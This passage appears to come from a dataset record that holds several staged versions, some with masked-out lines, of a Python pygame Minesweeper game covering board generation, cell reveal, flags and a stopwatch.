board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n <mask token>\n <mask token>\n <mask 
token>\n\n\nclass Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n <mask token>\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0]\n board.append(column)\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n if x > 0:\n if y > 0:\n if board[x - 1][y - 1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n if x < GRID_WIDTH - 1:\n if y > 0:\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == MINE:\n mines += 1\n if y > 0:\n if board[x][y - 1][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x][y + 1][0] == MINE:\n mines += 1\n if board[x][y][0] != MINE:\n if mines in range(1, 9):\n board[x][y] = str(mines), WHITE\n return board\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + 
CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n def get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y):\n return cell_x, cell_y\n return None, None\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n def draw_icon(self, shape, color, cell_x, cell_y):\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n else:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n 
label = font.render(shape, 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n <mask token>\n\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]:\n return\n if flags[x][y]:\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags,\n questionmarks)\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags,\n questionmarks)\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont('times new roman', 20)\n label = font.render(' High scores', 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50))\n SURFACE.blit(label, (500, 135))\n\n\nclass Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n\n def main(self):\n while True:\n left_click = False\n right_click = False\n SURFACE.fill(BG_COLOR)\n self.draw_board(self.board, self.revealed_cells, self.flags,\n self.questionmarks)\n self.create_menu()\n font = pygame.font.SysFont('times new roman', 25)\n self.timer.start()\n t1 = self.timer.get_seconds()\n label = font.render(str(t1), 1, MAGENTA)\n SURFACE.blit(label, (50, 50))\n for event in pygame.event.get():\n if event.type == pygame.locals.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.locals.MOUSEMOTION:\n self.mouse_x, self.mouse_y = event.pos\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1:\n self.mouse_x, self.mouse_y = event.pos\n print(self.mouse_x, self.mouse_y)\n left_click = True\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 3:\n self.mouse_x, self.mouse_y = event.pos\n right_click = True\n if self.game_over and right_click:\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n right_click = False\n if self.game_over:\n self.timer.pause()\n score = self.timer.get_seconds()\n a_x = X_BOARD_MARGIN + GRID_WIDTH / 4 * CELL_SIDE_LENGTH\n b_y = (Y_BOARD_MARGIN + Y_BOARD_MARGIN / 4 + GRID_HEIGHT *\n CELL_SIDE_LENGTH + GRID_HEIGHT * CELL_MARGIN)\n font = 
pygame.font.SysFont('times new roman', 25)\n if win:\n label = font.render('Congratulations, you won!', 1, GREEN)\n SURFACE.blit(label, (a_x - 75, b_y))\n label = font.render('Score: ' + str(score), 1, GREEN)\n SURFACE.blit(label, (a_x + 200, b_y))\n else:\n label = font.render('GAME OVER', 1, RED)\n SURFACE.blit(label, (a_x + 10, b_y))\n label = font.render('Press RIGHT mouse button', 1, YELLOW)\n SURFACE.blit(label, (a_x - 50, b_y + 25))\n cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y)\n if cell_x is not None and cell_y is not None:\n if not self.revealed_cells[cell_x][cell_y\n ] and not self.game_over:\n self.highlight_cell(cell_x, cell_y)\n if not self.revealed_cells[cell_x][cell_y\n ] and left_click and not self.game_over:\n if not self.flags[cell_x][cell_y\n ] and not self.questionmarks[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n if self.board[cell_x][cell_y][0] == MINE:\n self.revealed_cells = self.generate_data(True)\n self.game_over = True\n elif self.board[cell_x][cell_y][0] == CLEAR:\n self.reveal_cells(cell_x, cell_y, self.board,\n self.revealed_cells, self.flags, self.\n questionmarks)\n else:\n self.revealed_cells[cell_x][cell_y] = True\n self.draw_board(self.board, self.revealed_cells,\n self.flags, self.questionmarks)\n if not self.revealed_cells[cell_x][cell_y\n ] and right_click and not self.game_over:\n if self.flags[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n self.questionmarks[cell_x][cell_y] = True\n elif self.questionmarks[cell_x][cell_y]:\n self.questionmarks[cell_x][cell_y] = False\n self.flags[cell_x][cell_y] = False\n else:\n self.flags[cell_x][cell_y] = True\n self.questionmarks[cell_x][cell_y] = False\n self.draw_board(self.board, self.revealed_cells, self.\n flags, self.questionmarks)\n win = True\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if self.board[x][y][0] == MINE and not self.flags[x][y\n ] or self.board[x][y][0\n ] != MINE and not self.revealed_cells[x][y]:\n win 
= False\n if win:\n self.game_over = True\n pygame.display.update()\n CLOCK.tick(FPS)\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0]\n board.append(column)\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n if x > 0:\n if y > 0:\n if board[x - 1][y - 1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n if x < GRID_WIDTH - 1:\n if y > 0:\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == MINE:\n mines += 1\n if y > 0:\n if board[x][y - 1][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x][y + 1][0] == MINE:\n mines += 1\n if board[x][y][0] != MINE:\n if mines in range(1, 9):\n board[x][y] = str(mines), WHITE\n return board\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n def get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y):\n return cell_x, cell_y\n return None, None\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in 
range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n def draw_icon(self, shape, color, cell_x, cell_y):\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n else:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render(shape, 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n <mask token>\n\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]:\n return\n if flags[x][y]:\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, 
revealed, flags,\n questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags,\n questionmarks)\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags,\n questionmarks)\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont('times new roman', 20)\n label = font.render(' High scores', 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50))\n SURFACE.blit(label, (500, 135))\n\n\nclass Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\n<mask token>\n",
"step-4": "import sys\nimport random\nimport pygame\nimport pygame.locals\nimport time\nCELL_SIDE_LENGTH = 40\nCELL_MARGIN = 2\nGRID_HEIGHT = 10\nGRID_WIDTH = 10\nX_BOARD_MARGIN = 50\nY_BOARD_MARGIN = 75\nMENU_MARGIN = 100\nDIFFICULTY = 0.1\nFPS = 30\nNUM_MINES = 1 + int(GRID_WIDTH * GRID_HEIGHT * DIFFICULTY)\nWINDOW_HEIGHT = (CELL_SIDE_LENGTH * GRID_HEIGHT + CELL_MARGIN * GRID_HEIGHT +\n Y_BOARD_MARGIN * 2)\nWINDOW_WIDTH = (CELL_SIDE_LENGTH * GRID_WIDTH + CELL_MARGIN * GRID_WIDTH + \n X_BOARD_MARGIN * 2 + MENU_MARGIN)\nRED = 255, 0, 0\nYELLOW = 255, 255, 0\nGREEN = 0, 255, 0\nMIDGREEN = 40, 190, 40\nCYAN = 0, 255, 255\nBLUE = 0, 0, 255\nDARKBLUE = 20, 20, 60\nMAGENTA = 255, 0, 255\nBLACK = 0, 0, 0\nWHITE = 255, 255, 255\nGRAY = 200, 200, 200\nBG_COLOR = DARKBLUE\nCELL_COLOR = GRAY\nHIGHLIGHT_COLOR = CYAN\nFLAG_COLOR = MIDGREEN\nFLAG = 'flag'\nMINE = 'mine'\nCLEAR = 'clear'\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n\n def main(self):\n while True:\n left_click = False\n right_click = False\n SURFACE.fill(BG_COLOR)\n self.draw_board(self.board, self.revealed_cells, self.flags,\n self.questionmarks)\n self.create_menu()\n font = pygame.font.SysFont('times new roman', 25)\n self.timer.start()\n t1 = self.timer.get_seconds()\n label = font.render(str(t1), 1, MAGENTA)\n SURFACE.blit(label, (50, 50))\n for event in pygame.event.get():\n if event.type == pygame.locals.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.locals.MOUSEMOTION:\n self.mouse_x, self.mouse_y = event.pos\n 
elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1:\n self.mouse_x, self.mouse_y = event.pos\n print(self.mouse_x, self.mouse_y)\n left_click = True\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 3:\n self.mouse_x, self.mouse_y = event.pos\n right_click = True\n if self.game_over and right_click:\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n right_click = False\n if self.game_over:\n self.timer.pause()\n score = self.timer.get_seconds()\n a_x = X_BOARD_MARGIN + GRID_WIDTH / 4 * CELL_SIDE_LENGTH\n b_y = (Y_BOARD_MARGIN + Y_BOARD_MARGIN / 4 + GRID_HEIGHT *\n CELL_SIDE_LENGTH + GRID_HEIGHT * CELL_MARGIN)\n font = pygame.font.SysFont('times new roman', 25)\n if win:\n label = font.render('Congratulations, you won!', 1, GREEN)\n SURFACE.blit(label, (a_x - 75, b_y))\n label = font.render('Score: ' + str(score), 1, GREEN)\n SURFACE.blit(label, (a_x + 200, b_y))\n else:\n label = font.render('GAME OVER', 1, RED)\n SURFACE.blit(label, (a_x + 10, b_y))\n label = font.render('Press RIGHT mouse button', 1, YELLOW)\n SURFACE.blit(label, (a_x - 50, b_y + 25))\n cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y)\n if cell_x is not None and cell_y is not None:\n if not self.revealed_cells[cell_x][cell_y\n ] and not self.game_over:\n self.highlight_cell(cell_x, cell_y)\n if not self.revealed_cells[cell_x][cell_y\n ] and left_click and not self.game_over:\n if not self.flags[cell_x][cell_y\n ] and not self.questionmarks[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n if self.board[cell_x][cell_y][0] == MINE:\n self.revealed_cells = self.generate_data(True)\n self.game_over = True\n elif self.board[cell_x][cell_y][0] == CLEAR:\n self.reveal_cells(cell_x, cell_y, self.board,\n self.revealed_cells, self.flags, self.\n questionmarks)\n 
else:\n self.revealed_cells[cell_x][cell_y] = True\n self.draw_board(self.board, self.revealed_cells,\n self.flags, self.questionmarks)\n if not self.revealed_cells[cell_x][cell_y\n ] and right_click and not self.game_over:\n if self.flags[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n self.questionmarks[cell_x][cell_y] = True\n elif self.questionmarks[cell_x][cell_y]:\n self.questionmarks[cell_x][cell_y] = False\n self.flags[cell_x][cell_y] = False\n else:\n self.flags[cell_x][cell_y] = True\n self.questionmarks[cell_x][cell_y] = False\n self.draw_board(self.board, self.revealed_cells, self.\n flags, self.questionmarks)\n win = True\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if self.board[x][y][0] == MINE and not self.flags[x][y\n ] or self.board[x][y][0\n ] != MINE and not self.revealed_cells[x][y]:\n win = False\n if win:\n self.game_over = True\n pygame.display.update()\n CLOCK.tick(FPS)\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0]\n board.append(column)\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n if x > 0:\n if y > 0:\n if board[x - 1][y - 1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n if x < GRID_WIDTH - 1:\n if y > 0:\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == MINE:\n mines += 1\n if y > 0:\n if board[x][y - 1][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x][y + 1][0] == MINE:\n mines += 1\n if board[x][y][0] != MINE:\n if mines in range(1, 
9):\n board[x][y] = str(mines), WHITE\n return board\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n def get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y):\n return cell_x, cell_y\n return None, None\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n def draw_icon(self, shape, color, cell_x, cell_y):\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, 
color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n else:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render(shape, 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n\n def highlight_cell(self, cell_x, cell_y):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n pygame.draw.rect(SURFACE, HIGHLIGHT_COLOR, (left - CELL_MARGIN / 2,\n top - CELL_MARGIN / 2, CELL_SIDE_LENGTH + CELL_MARGIN, \n CELL_SIDE_LENGTH + CELL_MARGIN), 2)\n\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]:\n return\n if flags[x][y]:\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags,\n questionmarks)\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags,\n questionmarks)\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont('times new roman', 20)\n label = font.render(' High scores', 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50))\n SURFACE.blit(label, (500, 135))\n\n\nclass 
Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\ng = Game()\ng.main()\n",
"step-5": "import sys\nimport random\nimport pygame\nimport pygame.locals\nimport time\n\n# TODO high scores, difficulties\n\n# Absolutes (in pixels where not otherwise stated)\nCELL_SIDE_LENGTH = 40 # Side length of each cell\nCELL_MARGIN = 2 # Gap between cells\nGRID_HEIGHT = 10 # How many cells are in the grid\nGRID_WIDTH = 10\nX_BOARD_MARGIN = 50 # Gap between grid and sides of board\nY_BOARD_MARGIN = 75\nMENU_MARGIN = 100 # Amount of space on the right dedicated to the menu\nDIFFICULTY = 0.1 # Ratio of bombs (10% by default)\nFPS = 30 # frames per second (window refresh speed)\n\n# Relatives (so board size can easily be changed)\nNUM_MINES = 1 + int(GRID_WIDTH * GRID_HEIGHT * DIFFICULTY) # Default about 10% of the board is mines\nWINDOW_HEIGHT = (CELL_SIDE_LENGTH * GRID_HEIGHT) + (CELL_MARGIN * GRID_HEIGHT) + (Y_BOARD_MARGIN * 2)\nWINDOW_WIDTH = (CELL_SIDE_LENGTH * GRID_WIDTH) + (CELL_MARGIN * GRID_WIDTH) + (X_BOARD_MARGIN * 2) + MENU_MARGIN\n\n# R G B (not all used, but kept so theme can easily be changed)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\nGREEN = (0, 255, 0)\nMIDGREEN = (40, 190, 40)\nCYAN = (0, 255, 255)\nBLUE = (0, 0, 255)\nDARKBLUE = (20, 20, 60)\nMAGENTA = (255, 0, 255)\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGRAY = (200, 200, 200)\n\nBG_COLOR = DARKBLUE # Background color\nCELL_COLOR = GRAY # Universal cover color\nHIGHLIGHT_COLOR = CYAN # Cell the cursor is currently hovering over\nFLAG_COLOR = MIDGREEN\n\n# Symbols\nFLAG = 'flag'\nMINE = 'mine'\nCLEAR = 